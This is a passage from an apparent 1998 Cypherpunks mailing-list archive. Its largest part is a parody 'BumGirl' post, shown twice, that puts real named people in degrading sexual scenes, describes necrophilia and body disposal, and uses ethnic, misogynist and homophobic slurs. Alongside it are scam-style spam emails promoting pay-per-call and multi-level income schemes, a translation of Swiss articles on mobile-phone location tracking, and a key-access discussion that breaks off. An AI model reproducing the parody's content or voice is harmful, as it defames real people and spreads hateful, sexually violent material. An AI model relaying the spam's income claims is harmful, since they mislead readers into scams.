TCM: ou don't understand...*I* am the Author!

BumGirl: Well, bend me over and pretend we're married! Are 
you serious?

TCM: Nuke DC!
But seriously...Nuke DC!

BumGirl: If you are really the Author, as you claim, then why
aren't you trying to peek up my skirt, to see if I am wearing
panties?

TCM: That's Toto's schtick...pardon the pun...uuhhh...if it
*was* one...
Where was I? Hey! There's my shoes...
Anyway...
That's how the reader can tell which chapters of 'The True
Story of the InterNet' manuscripts are authentic, and which
ones are forgeries...by the perverted diatribes about peeking
up women's skirts that form an integral part of the forgeries
of that fucking asshole interloper on my...I mean...'the'...
CypherPunks list.
Besides, I read the above intro to this BumGirl interview, so
I know you're wearing Kevlar panties. That makes me *hot*...

BumGirl: Don't! Stop! Just because I have my head in the sand,
like your typical AOL'er, doesn't mean I can't tell what you're
trying to do back there...
Why did you stop? I'm Catholic, so I *have* to tell you to stop.
Don't! Stop! Don't stop! Don't stop!

TCM: Hey! That's not a diaphragm...that's a *badge*
Jesus H. 'Fucking' Christ! ou're Janet ReamHole...
DogFacedLyingMurderingNaziCunt!
No wonder you've got your head in the sand...

  [There was a loud popping sound on the audio tape that 
   the BumGirl EditWhores received from some anonymous
   coward, via snailmail with no return address on the
   envelope.
   The freelance BumGirl ReportWhore sent to do the
   interview mysteriously failed to return, causing us
   to wonder if we'd been duped, when the head of the
   DOBJ suddenly became 'unavailable for comment' at 
   the same time our ReportWhore disappeared. A few days
   later, however, the head of the DOBJ was spotted by
   the MainDream press as she exited a secret underground
   lavoratory suspected to be involved in cloning-related
   technology.
   Once an anonymous email arrived from Mark Hedges, who 
   really should learn to use learn remailers properly if 
   he's going to claim to be a CypherPunk (hint: delete 
   your digital signature before sending the fucking thing,
   dude...), BumGirl EditWhores couldn't help but notice 
   that, when she removed her glasses, she *did* look a lot 
   like Buddy...]


BUMGIRL DISCLAIMER:
There is absolutely no truth to the slanderous rumors being
spread by the Church of SubScientology (an affiliate of the
Norman Church--more commonly referred to as 'The Church of 
Jesus H. 'Fucking' Christ of Labor Day Chincs'--headquartered
in SaltLick City, China, and long rumored to be the secret 
lair of the Cult of One Dead Cow, Army of DogEaters Division),
turned over the violently abused and sexually violated carcass
of our missing BumGirl ReportWhore (dropped off at our offices 
by a barefoot, toothless old fart wearing a T-shirt with three 
lines of Perl code on the front) to local Ferral Bureau42 of 
Instigation foreskinsic axespurts.
The truth is, after our own exspurts performed DNA/RSA tests
on the body, to determine the exact nature of the bizarre
acts of cryptophilia performed upon her after her death, we
simply dumped her body next to several others down an old
mining shaft at a popular shooting range outside of Tucson,
where, unbeknownst to BumGirl, FBI agents were busy going
through the pockets of a witness to the Vincent Price/Phiszt
Foster parking-lot-car-drowning, having inadvertantly disposed
of the body without removing identifying signs such as large
diamond rings, expensive watches, folding money and loose 
change.
As the two MotorCycleMommaDykesOnSpikes, hired by BumGirl to
dispose of the body, fled the scene, they overheard one of
the FBI agents, who had been trained by Lieutenant Calley not 
to waste perfectly good pussy, exclaim, upon lifting our dead
ReportWhore's skirt, "Jesus H. 'Fucking' Christ, it's Jimmy 
FuckingGodamnn Hoffa!" Apparently, another FBI agent, after
performing a street-sniff test on our dead ReportWhore's 
dick, contended that it was not Hoffa, but J. Edgar Hoover,
with another agent confirming his suspicions by giving the
dick a long, involved taste-test to preclude any possibility
of the dick being a Cirle Of Eunuchs transplant meant to
disguise the body as that of the recently missing caterer
to the Bay Area CypherPunks physical meetings.

The MotorCycleMommaDykesOnSpikes told BumGirl EditWhores,
as we paid them the agreed-upon fee of 'as many rolls of
quarters as you can carry without using your hands', "We
couldn't pass up the opportunity to commit oral sodomy on
your dead ReportWhore before dumping HimOrHer down the
mind shaft, and, well...she tasted a lot like Buddy..."

Although it *is* true that BumGirl hired the current head
of the DOBJ to finish the BumGirl interview with TCM, (not
to be confused with Turner Classic Movies), we told HimOrHer
that the best approach would be to show up unannounced on
Mayonnaise Mountain, flash HisOrHer badge, and announce 
that she was just taking him downtown, 'to answer a few 
questions."
BumGirl EditWhores do not expect the T.C. BUTTSLAM interview
to be completed, but we are making plans to include a photo-
special in our next edition, titled, "Beware the Ides of May"
complete with never-before-seen scenes of oft-rumored but
never confirmed Secret CypherPunks Social Activities known
only to 34th Degree Masons and Greek immigrant HodCarriers.

      Also In The August, 1998, Edition Of BumGirl:
Army of Bitch Hostage Disposal - "Smoke 'em if you got 'em!"
Cult of One Dead Cow Mission Statement & Barbeque Recipe
CypherPunks Activity Project #327 - "Test (No Reply)"
BumGirl Interview: Buddy
"I should have suspected something when the SexCriminal had
 the WhiteHouse VeteranAryan, Attila T. Hun, pull *all* of 
 my teeth..."
CenterFold: Blanc Weber 
 "WhiteLipstick Power in MicroSoft Village"
 [WAS: MicroHard Victim of Friendly MakeOver--Corporate 
  Assettes Down 2" As BadBillyG Emerges From Closet Dressed
  For SuckSession, With Micro$not DC NaziSpinLobbyists 
  Standing Firmly <hee-hee> Behind Him]
 [NEVERWAS: CypherPunks Come Out Of Closet -- EmBareAssed
  Gay Activists Force Them Back In...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Tue, 14 Jul 1998 20:33:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BumGirl - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C92EF.5F68B900.7@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


~         BUMGIRL          ~
Entertainment for NastyGirls             July 1998 * $7.09
____________________________

Trojan Horse Sucking
Anniversary Issue

BumGirl Interview:
Wham! Bam! Thank ou Ma'am!
T.C. BUTTSLAM
{AKA-T.C. May, FifteenInchNails, Human Gus-Peter Sr., 
     AConsistentNetPersonaToBeNamedLater, CypherPunks
     Philosopher King, The Last True CypherPunk, 
     The Only Real CypherPunk, ad infinitum}

VIAGRA AND SALTPETER
Jim Belushi's Untold Story

Mick 
Jagger
GIVES GREAT LIP!

_____________________________________________________________

			DEAR BUMGIRL

BUMMED BO
  "I was devastated to learn that the June, 1998, issue of
  BumBoy Magazine was nothing more than a fraudulent ruse
  by the Electronic Forgery Foundation.
  "Were the terrible things said about Tim C. May in the
  BumBoy Interview with C-J VAN DAMNNED actually true?"
~Eric Cordial, T.O.T.O.

  {ou will find out in this month's BumGirl Interview,
   as we bend you over and 'give it to you'--straight 
   from the Horse's Ass. - BG}

		     THE BUMGIRL ADVISOR

THE DOORS OF DEPTH PERCEPTION
  "I gagged Linda Lovelace. What do I do with the body?"
~ William GagHer III,
  Dawn Long Juan of the CypherPunks Disturbed Male LISP

  {Wake up! (and smell Jennifer Flowers...) - BG}


			 MOVIES

TERMINATING RESISTOR 3
TR3 completes the Magic Circle of Eunuchs with a bizzare, if
somewhat predictable twist, as ACyborgToBeNamedLater begins
to materialize on the SilverSceenOfVirtualReality in the form
of TheRealGuy...naked, as usual.
It turns out that the Author, sent back in VirtualRealityTime
by John Parker, in order to ensure the safety of Captain John
Parker, thus preserving the course of history taken by the
American Revolution, got drunker than a skunk on cheap Scotch,
and ended up embroiled in the Legendary CypherPunks Moderation 
Revolution/Anti-Censorship CounterRevolution of 1997, instead.
The Author, again predictably, spills Scotch on his Digital
Implant during his journey through time, frying the Radio
Shack circuitry that resulted in HimOrHer being dubbed, "The
Six Million Peso ManOrWoman ($42.00/U.S.)" and becomes a
Taoist AuthorBot working for both the Farces of Light and
the Farces of Darkness, thus saving the movie producers the
expense of paying an extra actor in this low-budget, B-grade
Film BlancNoire.
The movie quickly degenerates into a pornographic monstrosity,
with Sarah Parker, unsure as to who the father of John Parker
actually is, since the little glue-sniffing prick was conceived
during an alcoholic binge, fucks everyone in sight, to make 
sure the little bastard gets conceived. The Author, obsessive-
compulsive tit-man that he is, invariably throws his hands over
her boobs at the slightest sign of danger, claiming, "John's a
growing boy...he needs his milk."
Investigating the Church of the SubGenius, the AuthorBot soon
discovers that the movie is being produced by a group of non-
union UnderGroundReptilianNazis, as a result of overhearing
several of the producer's phone conversations, which they
always end by saying, "Let's do Earth."
The AuthorBot develops an obsession with Little Timmy Mayonnaise
after becoming sexually excited by the Evil Dr. Vulis's ASCII
Art Spams, begins wearing a CoonSkin hat made from the hide of
Medgar Evans and drunkenly mumbling, "Remember Los Alamos...
Chop, Chop!" at every opportunity.
The saving grace of the movie is the soundtrack, courtesy of
Al Fowl And The Snakes, a Tucson ReptilianChickenBot Band
of ill-repute, featuring their Number 1 With a HollowPoint-
TeflonTipped-CopKillerBullet song, "If ou Can't Kill The
Authority Figure ou Love/Hate, Kill The One In our Cross-
Hairs."

BUMGIRL RATING - One Long, Hard Prick Up our Butt

__________________________________________________________

BumGirl Interview: T.C. BUTTSLAM

  A LindaLoveLaceInDepthInterview with one of the original
  Flounders ("I may smell like fish, but don't call me 
  chicken.") of the CypherPunks Disturbed Male LISP, Timothy 
  C. "No! It doesn't stand for 'cocksucker'!" May.
  After checking the Andy WhoreHole Mailing List archives, 
  and finding that it was <tcmay@got.net> who originally 
  posted the concept that, in the future, every CypherPunk 
  would have 15" of fame, BumGirl EditWhores decided to change
  the cover of the July, 1998, edition to feature a picture
  of a variety of current CypherPunks wearing only athletic-
  support cups with long, long, long bar-codes on them. 

  {ANastyBumGirlToBeReamedLater, caught in a cross-fire on
  Mayonnaise Mountain between Timothy C. May, the Philosopher
  Marksman of the CypherPunks Disturbed Male LISP, and LEA's
  who were badly outmanned and outgunned by the Cult Of One
  CypherPunk who owns a variety of weaponry registered in
  the names of a plethora of CypherPunks Consistent Net
  Personas, bent over and stuck her head in the sand, hoping
  that if she took one in the butt, it would be a long, hard
  one, Teflon-tipped, in order to penetrate her new Kevlar
  panties.
  The BumGirl interview took place during lulls in the action,
  when LEA agents carried off their dead and wounded, while
  LittleBigTimmy and Dust'em Hoffman argued over their Pretty
  Lousy Privacy CryptoPhones as to how many dead IRS agents
  it takes to spell, "I *told* you Jim Bell is a CypherPunk!"}


BumGirl: our Tim C. May CypherPunks Consistent Net Persona
has such long and well-documented history of raising hell with
the sides of the Bleeding Edge of InterNet Freedom and Privacy
Technology (TCM) that it is hard to know where to begin.

TCM: Let's talk about the Author, instead.

BumGirl: Shit! Is this interview just another piece of mindless
trash from the Electronic Forgery Foundation?

TCM: ou don't understand...*I* am the Author!

BumGirl: Well, bend me over and pretend we're married! Are 
you serious?

TCM: Nuke DC!
But seriously...Nuke DC!

BumGirl: If you are really the Author, as you claim, then why
aren't you trying to peek up my skirt, to see if I am wearing
panties?

TCM: That's Toto's schtick...pardon the pun...uuhhh...if it
*was* one...
Where was I? Hey! There's my shoes...
Anyway...
That's how the reader can tell which chapters of 'The True
Story of the InterNet' manuscripts are authentic, and which
ones are forgeries...by the perverted diatribes about peeking
up women's skirts that form an integral part of the forgeries
of that fucking asshole interloper on my...I mean...'the'...
CypherPunks list.
Besides, I read the above intro to this BumGirl interview, so
I know you're wearing Kevlar panties. That makes me *hot*...

BumGirl: Don't! Stop! Just because I have my head in the sand,
like your typical AOL'er, doesn't mean I can't tell what you're
trying to do back there...
Why did you stop? I'm Catholic, so I *have* to tell you to stop.
Don't! Stop! Don't stop! Don't stop!

TCM: Hey! That's not a diaphragm...that's a *badge*
Jesus H. 'Fucking' Christ! ou're Janet ReamHole...
DogFacedLyingMurderingNaziCunt!
No wonder you've got your head in the sand...

  [There was a loud popping sound on the audio tape that 
   the BumGirl EditWhores received from some anonymous
   coward, via snailmail with no return address on the
   envelope.
   The freelance BumGirl ReportWhore sent to do the
   interview mysteriously failed to return, causing us
   to wonder if we'd been duped, when the head of the
   DOBJ suddenly became 'unavailable for comment' at 
   the same time our ReportWhore disappeared. A few days
   later, however, the head of the DOBJ was spotted by
   the MainDream press as she exited a secret underground
   lavoratory suspected to be involved in cloning-related
   technology.
   Once an anonymous email arrived from Mark Hedges, who 
   really should learn to use learn remailers properly if 
   he's going to claim to be a CypherPunk (hint: delete 
   your digital signature before sending the fucking thing,
   dude...), BumGirl EditWhores couldn't help but notice 
   that, when she removed her glasses, she *did* look a lot 
   like Buddy...]


BUMGIRL DISCLAIMER:
There is absolutely no truth to the slanderous rumors being
spread by the Church of SubScientology (an affiliate of the
Norman Church--more commonly referred to as 'The Church of 
Jesus H. 'Fucking' Christ of Labor Day Chincs'--headquartered
in SaltLick City, China, and long rumored to be the secret 
lair of the Cult of One Dead Cow, Army of DogEaters Division),
turned over the violently abused and sexually violated carcass
of our missing BumGirl ReportWhore (dropped off at our offices 
by a barefoot, toothless old fart wearing a T-shirt with three 
lines of Perl code on the front) to local Ferral Bureau42 of 
Instigation foreskinsic axespurts.
The truth is, after our own exspurts performed DNA/RSA tests
on the body, to determine the exact nature of the bizarre
acts of cryptophilia performed upon her after her death, we
simply dumped her body next to several others down an old
mining shaft at a popular shooting range outside of Tucson,
where, unbeknownst to BumGirl, FBI agents were busy going
through the pockets of a witness to the Vincent Price/Phiszt
Foster parking-lot-car-drowning, having inadvertantly disposed
of the body without removing identifying signs such as large
diamond rings, expensive watches, folding money and loose 
change.
As the two MotorCycleMommaDykesOnSpikes, hired by BumGirl to
dispose of the body, fled the scene, they overheard one of
the FBI agents, who had been trained by Lieutenant Calley not 
to waste perfectly good pussy, exclaim, upon lifting our dead
ReportWhore's skirt, "Jesus H. 'Fucking' Christ, it's Jimmy 
FuckingGodamnn Hoffa!" Apparently, another FBI agent, after
performing a street-sniff test on our dead ReportWhore's 
dick, contended that it was not Hoffa, but J. Edgar Hoover,
with another agent confirming his suspicions by giving the
dick a long, involved taste-test to preclude any possibility
of the dick being a Cirle Of Eunuchs transplant meant to
disguise the body as that of the recently missing caterer
to the Bay Area CypherPunks physical meetings.

The MotorCycleMommaDykesOnSpikes told BumGirl EditWhores,
as we paid them the agreed-upon fee of 'as many rolls of
quarters as you can carry without using your hands', "We
couldn't pass up the opportunity to commit oral sodomy on
your dead ReportWhore before dumping HimOrHer down the
mind shaft, and, well...she tasted a lot like Buddy..."

Although it *is* true that BumGirl hired the current head
of the DOBJ to finish the BumGirl interview with TCM, (not
to be confused with Turner Classic Movies), we told HimOrHer
that the best approach would be to show up unannounced on
Mayonnaise Mountain, flash HisOrHer badge, and announce 
that she was just taking him downtown, 'to answer a few 
questions."
BumGirl EditWhores do not expect the T.C. BUTTSLAM interview
to be completed, but we are making plans to include a photo-
special in our next edition, titled, "Beware the Ides of May"
complete with never-before-seen scenes of oft-rumored but
never confirmed Secret CypherPunks Social Activities known
only to 34th Degree Masons and Greek immigrant HodCarriers.

      Also In The August, 1998, Edition Of BumGirl:
Army of Bitch Hostage Disposal - "Smoke 'em if you got 'em!"
Cult of One Dead Cow Mission Statement & Barbeque Recipe
CypherPunks Activity Project #327 - "Test (No Reply)"
BumGirl Interview: Buddy
"I should have suspected something when the SexCriminal had
 the WhiteHouse VeteranAryan, Attila T. Hun, pull *all* of 
 my teeth..."
CenterFold: Blanc Weber 
 "WhiteLipstick Power in MicroSoft Village"
 [WAS: MicroHard Victim of Friendly MakeOver--Corporate 
  Assettes Down 2" As BadBillyG Emerges From Closet Dressed
  For SuckSession, With Micro$not DC NaziSpinLobbyists 
  Standing Firmly <hee-hee> Behind Him]
 [NEVERWAS: CypherPunks Come Out Of Closet -- EmBareAssed
  Gay Activists Force Them Back In...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 14633260@msn.com
Date: Wed, 15 Jul 1998 21:34:32 -0700 (PDT)
To: OOOXXXI@uunet.uu.net
Subject: Make $1000's Weekly ! --- First Check Next Week !
Message-ID: <QQeyfq19053.199807160434@relay6.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain




*****   All You Do Is Advertise OUR phone number !!!   *****
              ****   WE DO THE REST !!!   ****
                (800) 811-2141  ID# 55916

- GET PAID EVERY FRIDAY !!!
- NO PHONE CONVERSATIONS !!!
- NO SELLING !!!
- NO EXPLANING !!!
- NO CONVINCEING !!!
- NO TALKING TO ANYONE !!!
- NO ONGOING MEMBERSHIP FEES !!!
- NO COMPLICATED BUSINESS TO RUN !!!
- You do nothing but advertise Our Phone Number !!!
       - Send Bulk Email, Flyers, Little Classified Ads, Whatever You Like!

- OUR Live Operators handle all your calls professionally & courteously,
  then WE Pay You !

A successful, honest, & proven Home Based Business Opportunity !

People are already making in excess of $1000 per week doing 
doing nothing more than advertising OUR Toll Free Number and
your personal ID Number !!!!

Need Additional Income? You owe it to yourself to just listen.  
Toll Free Testimonials: (888) 703-5389, (888)731-3457, (888)446-6951


For More Information, Call Us Today: (800) 811-2141   ID# 55916
     

---------
Per Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions to you
by the sender of this email may be stopped at no cost to you by use of the 
following link:
<A HREF="http://209.84.246.162/remove.htm"> 
Click here to go to global remove site if you want your address removed from
mailing </A>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Tue, 14 Jul 1998 18:48:27 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Can't keep it DOWN/Man gets breasts by mistake
Message-ID: <19980714234348.22245.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

Click for STUFFED: Tuesday July 14 1998


<img src=http://stuffed.net/98/7/14/cover.gif width=300
height=380 border=0 alt='Click here for STUFFED, the new daily
 tabloid news, humor and babes newspaper from Eureka!'>

This is a combined text/html email. If your email client can
display html web pages  you probably won't see this text but
should see the front cover of today's issue above, which you
should  click on to read.  If you cannot see the cover, your
email client either cannot display html or its' options have
been set to  ignore html images.  In which case,  please ...
Click here to read today's! --> http://stuffed.net/98/7/14/

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Tue, 14 Jul 1998 16:44:27 -0700 (PDT)
To: declan@well.com
Subject: Re: FC: Why not to have "Privacy Commissioners"
In-Reply-To: <Pine.GSO.3.95.980714101016.8521G-100000@well.com>
Message-ID: <19980715000720.2548.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain


> Declan, These articles (unfortunately in German) are excellent
> examples of the true purpose of EU-style "Privacy
> Commissioners". Their purpose of course being to provide a whitewash
> to privacy violating activities by the government.

> Anyone want to translate 'em?

Here's a very quick translation. I loved that bit where AltaVista
translated "crackle" as "kneeling asterisk", anyway I hope this is
more readable than those miracles of machine translation.


SonntagsZeitung Online, July 12, 1998:

The movement profiles do exist

A confidential report by the data protection commissioner unveils:
Swisscom collects the complete Natel cell phone data every three hours

BY NIKLAUS RAMSEYER AND DENIS VON BURG

BERNE - a secret report by data protection commissioner Odilo Guntern
proves: Swisscom locates all powered-on Natel phones in Switzerland
with an accuracy of 100 meters every three hours and stores these data
for seven days.

Things are not as bad as all that, it's all legal, and there's no
problem whatsoever, the Swiss federal data protection commissioner
Odilo Guntern appeased the public last Monday. Swisscom AG apparantly
has "the possibility of locating every powered-on Natel at any time",
he admitted. That however only within the so-called Location Areas
comprising of 50 kilometers each - and certainly not down to the 2,500
a few kilometers small radio cells in the country "as claimed by the
SonntagsZeitung", Guntern said.

What the public did not learn: Gunterns lean three-page paper is only
the tip of the iceberg. Hidden behind it there is a 30 pages long
secret report that Guntern delivered only to "the parties involved",
as he calls it. "Involved" are Swisscom, Leuenberger's
(communications) and Koller's (justice and police) departments and the
parliament's revisions delegation.

Gunterns confidential report not only contains the crucial information
to the Natel issue. It partly contradicts the public remarks and to a
large extent confirms the SonntagsZeitung article of 28 December
1997. In particular Guntern concealed that the 800,000 Natel users in
Switzerland can not only "be located", but are subject to a fully
automatted Periodic Location Updating (PLU). PLU means: Every active
Natel will announce itself to the closest antenna every three hours,
then Swisscom will register its location.

Each Natel owner can verify that himself: It is sufficient to put the
switched-on mobile telephone next to a transistor radio. It then will
emit a clearly audible galloping crackle.

Movement data in some cases are stored for many weeks

The location information covers not only "one of only 30 location
areas" in the country, as Guntern wanted to make believe, it descends
down to "radio cell level". In cities it has a precision of a few 100
meters - in open rural areas still a precision of max. 10
kilometers. At least that is what experts from a leading Natel company
assure. Thus the quite precise Natel location is registered every
three hours. Worse yet: Swisscom stores the cell phones' corresponding
"movement data" for seven days - in some cases even for weeks and
months.

SVP member of parliament Bernhard Seiler, who is president of the
parliament's GPK delegation, confirms these facts to the
SonntagsZeitung. Data Protection commissioner Odilo Guntern too
admits: "The subject PLU is discussed in detail in my report." He will
not talk about "technical details" however.

It is quick to calculate. Eight location reports from 800,000 cell
phones per day, stored for one week: Swisscom permanently has more
that 40 million data available on where and how the 800,000 Natels are
moving through the country. They only serve for making connections, is
said officially. But whoever has access to this information can
immediately print out a "movement profile" and learn where exactly the
Natel (and thus, its owner) has been during the past seven
days. Guntern: "That is not impossible." Using radiogoniometics (see
graphics) Swisscom can even locate each Natel to an exactness of 50
meters and tap the conversations.

That also applies to the controversial Natel D Easy: "we have movement
data and operational data for these devices as well", Odilo Guntern
assures. That explains why the Conferedate Justice and Police
Department and Federal Attorney General Carla Del Ponte demand that
buyers of such devices should be registered systematically. If
necessary the police would like to know whom the movement profile of a
given Natels belongs to.

And why did the Guntern report remain secret? The "parties involved"
blame each other for the secretiveness. Guntern: "I didn't even ask
them if they would like to publish the report, and decided myself that
it was not public."

The controlling authorities at the Swiss parliament are not going to
accept that: "We were of the opinion that the entire Guntern report
would be presented in public", says the SP deputy Werner Carobbio from
Tessin, who also is a member of the GPK delegation. "We will bring up
the issue of "movement profiles of Natel users" for deepened
discussion", he promises.

---------------------------------------------------------------

Les Temps Online, July 7, 1998:

COMMUNICATION

TELECOMS. Yesterday the federal data protection commissioner presented his
annual report

Odilo Guntern: "Natel owners must be able to remain anonymous"

By Gabriel Sigrist

In Switzerland, every citizen can walk into a store and acquire a
smard part to be inserted into a portable telephone for 120
francs. Swisscom's system Natel D Easy does not require any
subscription and thus the user can remain anonymous. This anonymity
disturbs the Attorney General of the Confederation, Carla Del Ponte,
who on several occasions set her face against a system "used by all
the criminals". According to the department of public prosecution, the
new ordinance on telecommunications imposed identification of Natel D
easy users beginning January 1st. The federal data protection
commissioner's report completely contradicts this assertion. "There is
no legal base for keeping records of Natel easy customers", Odilo
Guntern concludes in his annual report. The data protection
commissioner goes even further: "In our society, protection of the
individual requires the possibility to talk on the phone without being
recorded in files, he stated towards Les Temps. Record the purchasers
of "easy" cards does not make sense because the criminals use other
means to remain anonymous, such as foreign cards but also call-back
services or simply phone booths." In the neighbour countries however
the purchasers of such cards must declare their identity. "It is
because the laws are different, explains Odilo Guntern. In
Switzerland, identification is obligatory only when there is a
long-term customer provider relation, which is not the case with
pre-paid cards." The card easy is thus legally comparable to a CFF
multicourse subscription or a phone card to use in booths. Goods which
can be acquired anonymously.

However the debate is not closed: "In our opinion the legal base is
sufficient to impose registration of the users, explains Jrg Blaser,
spokesman of the department of public prosecution. It is essential for
the security of our country to be able to identify the holders of
portable telephones." The federal Office of communications (Ofcom)
will decide. According to Odilo Guntern, it currently remains
"perfectly legal" to acquire a card easy without giving your
name. Swisscom however encourages the purchasers to identify
themselves: the operator offers a small gift to those who reveal their
personal data.

The comissioner also occupied himself with in the possibilities of
tracing mobile telephones. According to his report, Swisscom can
locate a simply powered-on portable in a relatively large zone, but
not to the cell (a circle of ten kilometers). There too, opinions
diverge.

According to Christian Masson, enthusiastic activist of the freedom of
circulation, the GSM system used by Swisscom's Natel stores the
precise localization of the devices every three hours, for maintenance
purposes. Odilo Guntern does not mention such a process in his
report. According to Swisscom, the users' positions are erased
during their movement.

The report also puts emphasis on customer fidelity cards such as the
M-Cumulus by Migros. "Any holder of such a card must be informed of
the various discounts of which he can profit, as well as of the data
processing relating to it", indicates the report.

On the Internet:

The full report of the federal data protection commissionser on
www.edsb.ch

The site of Mr. Masson on www.iimel.com/interception/mobile_trace.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: optinnow@latinmail.com
Date: Tue, 14 Jul 1998 21:39:53 -0700 (PDT)
To: anyone@opportunistic.com
Subject: Fast Growing Home Based Business...
Message-ID: <199807150441.NAA07224@age-ns.agesystem.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


This message complies with the proposed United States Federal
requirements for commercial e-mail bill, Section 301. For additional
information see:

http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html

Required Sender Information
Richard Eastburn
8535 Tanglewood Square, Suite 5108
Chagrin Falls, OH 44023-6401
1-440-564-2084

To:   Savvy Network Marketer
RE:  NEW FAST GROWING HOME BUSINESS
From:  Richard Eastburn

This is an advertisement for a Home Business.  We hope you will find the
 information we provide useful in achieving your financial, personal,
and family goals.  If we have mailed this to you in error, please click
remove below.  You are on our list because you emailed me or I read a
classified ad of yours.  Thank you for your consideration

Unbelievable Growth In This Company Expected:     Now. . .Future

Get in on the early stage of a new dynamic business started in April
'98. Since April, people have joined by the thousands!.  We expect thousands
 more to be coming!..... Yes, I did say thousands!!

Why is this company attracting so many people?
 Solid leadership to help you learn and gain success.
 Networking leaders bring in their downlines.
 Excellent products of value YOU will use.
 The best of compensation plans.
 Free suite of Internet business and marketing tools.

In the next few months this company has the strong potential to
 double--triple--and more.  The spillover will be incredible; AND that
benefits you'if you get in now.  If you get TWO people into the 2X6
matrix you are qualified.  Most people get EXCITED and get new people to join.
Many people are bringing their whole family into this business.  When
was the last time you saw a Home Business that you or others wanted lots of
family in the business??   

 Take a look-.over 65% of all people who look like it and join.  This is 
your chance for a truly unique business opportunity that can create your 
financial independence.

If you are interested in creating your financial independence 

        CALL:           1-440-564-2084
                                                    or
        WRITE:          Financial Independence, Suite 5108
                               8535 Tanglewood Square
                               Chagrin Falls, OH 44023-6401

Thank you. . . . .Richard Eastburn

>>> Per Section 301, Paragraph (a) (2) (C) of S. 1618,  <<<
>>> further transmissions to you by the sender of this  <<<
>>> email may be stopped at no cost to you by sending a <<<
>>> reply to this email address with the word "Remove"  <<<
>>> in the subject line. Thank you for your time <<<







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <remailer@htp.org>
Date: Tue, 14 Jul 1998 18:55:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Stan & Tim
Message-ID: <19980715015501.29920.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain



Hints that an anonymous poster is Tim may be red herrings. Given Stan's recent "research" into Xian conspiracy,
he may have other enemies than Tim...
[cypherpunk issue: how do you tell that anonymous posts aren't really anonymous?]

That said, I'm surprised at the number of "SPANK" emails directed at Stan. (Especially since they're from
anonymous accounts which he just said he has killfiled. Duh!)

I find some of his posts amusing, some edifying, some boring, but mostly not "clueless", unlike the following
cascade which I've paraphrased slightly:

some nobody said:
> another nobody said:
>> yet another nobody said:
>>> still more nobody said:
>>>> I think Stan is clueless
>>> Me Too.
>> Me Too!
> Me Too!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "HELMY Enterprises, Inc." <email@helmy.com>
Date: Wed, 15 Jul 1998 05:18:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Hi
Message-ID: <199807150518420530.012FA568@server03.option.net>
MIME-Version: 1.0
Content-Type: text/plain


>From HELMY Enterprises, Inc.

Dear Webmaster,

Offer daily updated 'Headline News' (and more) and look like one of the big boys!

To learn more please visit us at:

http://www.helmy.com/dc/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 14 Jul 1998 21:00:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Message From Jim Bell
Message-ID: <199807150400.GAA00984@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim would like to thank those of you who have sent him
hidden files, as he requested.
However, he would appreciate it if you clueless fucks
would send the hidden files in *cakes*, not in floppy
disks.
[I told him it was a mistake to post to the Cypherpunks
AOL Distributed Node.]

Nobody Juno, eh?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 15 Jul 1998 09:48:43 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 15, 1998
Message-ID: <199807151630.LAA20849@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#000000"
SIZE=2>=============================================
Welcome to today's edition of the CTIA Daily
News
from WOW-COM.  Please click on the icon /
attachment
for the most important news in wireless
communications today.

WIRELESS IT '98, The Next Generation in
Personal
Computing & Communications October
12-14,
Las Vegas, Nevada Call (202) 785-0081 for more
information!
<FONT COLOR="#000000"
SIZE=2>=============================================<FONT
COLOR="#000000">
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie_Kaufman@iris.com
Date: Wed, 15 Jul 1998 11:14:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: GAK 4 -- For whom the Doorbell tolls
Message-ID: <85256642.0064AF8F.00@arista.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


GAK4 is technically inaccurate but very good metaphor by which to consider
this proposal. I believe this is a minor skirmish in the war between civil
libertarians and Big Brother with industry playing the role of arms
merchant. It is not Government Access to Keys, it is Government Access to
Encrypted Data, which for everyones purposes is the same thing.

In answer to the question: "Should Cisco and friends be allowed to export
this technology?", of course they should. People should be allowed to
export whatever they want. Even if you're Big Brother, this proposal
enables all the same capabilities as GAK, so there is no reason to oppose
it.

In answer to the question: "Is this a 'compromise' that addresses the
issues of civil libertarians?", not a bit. The devil is in the details, of
course, in issues of whether the government can ask the encryption points
for copies of the data in real time, in an unaudited fashion, and/or with
